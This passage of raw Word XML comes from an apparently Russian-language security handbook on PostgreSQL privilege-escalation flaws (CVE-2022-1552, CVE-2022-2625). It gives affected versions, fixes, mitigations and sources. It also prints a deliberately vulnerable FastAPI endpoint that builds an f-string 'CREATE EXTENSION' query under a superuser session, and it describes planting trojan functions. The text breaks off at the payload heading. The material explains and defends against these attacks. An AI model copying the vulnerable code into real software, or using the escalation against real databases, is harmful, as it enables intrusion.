          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9E0FD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   На версиях PG ≤ 14.2 / 13.6 / 12.10 / 11.15 / 10.20 — любой index expression со ссылкой на функцию из чужой schema критичен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D16E37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все ветки PG до фикса 12.05.2022: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77742D8E"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D7DEAAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>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2A0DF9D"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0AF7DA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="57043D1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04A223"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CCF4CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.2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83F60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="741E9CB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A84E75"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D6B3B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.6</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B8A1AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7CD0D30A"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7028BF"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D80DD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.10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96CA04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1CAD40BB"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3D33CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>11.x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F8FB0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.15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C3980E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4AEE8590"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991223" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.x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599824" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.20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2E653B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.21 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B86CC57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На версиях PG ≥ 14.3 / 13.7 / 12.11 / 11.16 / 10.21 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрыта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SRO применяется к index expressions в ANALYZE/REINDEX/CLUSTER/REFRESH MATVIEW/pg_amcheck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59F614" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Дополнительная защита в PG 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (релиз 26.09.2024): добавлены predefined role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и table-level privilege </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, позволяющие делегировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VACUUM</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REINDEX</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CLUSTER</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REFRESH MATERIALIZED VIEW</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOCK TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без выдачи superuser. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>снижает поверхность атаки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> post-fix: даже если будущий аналогичный CVE появится, можно делегировать обслуживание maintenance-роли без superuser-rights, и эскалация будет ограничена правами этой роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F423A41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1930C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связанная защита: SECURITY DEFINER функция-обёртка для legitimate index expression вызывается с явным SET search_path, что предотвращает hijack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F331F7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4 Extension scripts CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой path-to-superuser через подмену объекта. Граница: 3.13.3 — index expression trap; 3.13.4 — function pre-create + extension trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B8FA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — финальные RCE-векторы, доступные после эскалации до superuser через CVE-2022-1552.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D27E3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 (Хронология 2022)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст 12.05.2022 fixes (CVE-2022-1552), и 11.08.2022 (CVE-2022-2625 — см. 3.13.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41C712" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7EE05E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2022-1552 — https://www.postgresql.org/support/security/CVE-2022-1552/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A726665" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2022-1552 — https://nvd.nist.gov/vuln/detail/CVE-2022-1552</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CEE811" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «CREATE INDEX» (expression indexes) — https://www.postgresql.org/docs/current/sql-createindex.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A99091" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Routine Reindexing» (autovacuum context) — https://www.postgresql.org/docs/current/routine-reindex.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BF3F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 14.3 Release notes (Security Fixes) — https://www.postgresql.org/docs/release/14.3/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406AA9FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 17 Release notes (pg_maintain) — https://www.postgresql.org/docs/release/17.0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57081A5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R15 (sources/research.md, строки 246–252)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE83840" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.13.4 Extension scripts: CREATE OR REPLACE подмена (CVE-2022-2625)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2E09E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> До PostgreSQL 14.5 (и параллельных minor-фиксов) при выполнении </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не проверял ownership</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> объектов, которые extension script пытался создать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE VIEW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если в целевой схеме уже существовал объект с таким же именем (созданный атакующим заранее), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>переписывал его metadata, оставляя тело функции атакующее</w:t>
      </w:r>
      <w:r>
        <w:t>, и transfer-ил ownership к extension. При последующем вызове функции admin-ом или autovacuum исполнялся код атакующего с правами вызывающей роли (типично superuser, потому что admin сам устанавливает extension).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062FE07F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C42C78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application-кода как такового нет — это серверная DDL-атака, требующая только SQL-execution в обычной user-сессии. Уязвимая комбинация — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>environment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PG до фикса + admin, готовый запустить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (например, при upgrade contrib-пакета, по плану внедрения новой функциональности, через automated provisioning-скрипт).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EAEA9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если показывать через application — то это admin-tool типа SQL Console (как в 3.7.2a) или migration-runner, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит в обход проверок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C37359E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/admin/extensions.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D10CB29"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684ECFCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328667CD"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69490121" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_superuser_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BD5124" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE991C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4A882" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E134D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/admin/extensions/install")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B48C4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def install_extension(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21770CF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name: str,  # user-selected extension name из admin-UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F38180B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_superuser_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FF5B6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40634122" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # admin-UI позволяет DBA устанавливать contrib-extensions кликом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC69BB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"CREATE EXTENSION IF NOT EXISTS {name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705026DF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF03B16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь admin запускает CREATE EXTENSION под superuser. Атакующий заранее создал trojan-функцию в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (что было возможно до PG 15), и при установке extension trojan transfer-ится к extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417A16C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — двухшаговая атака с deferred trigger</w:t>
      </w:r>
    </w:p>
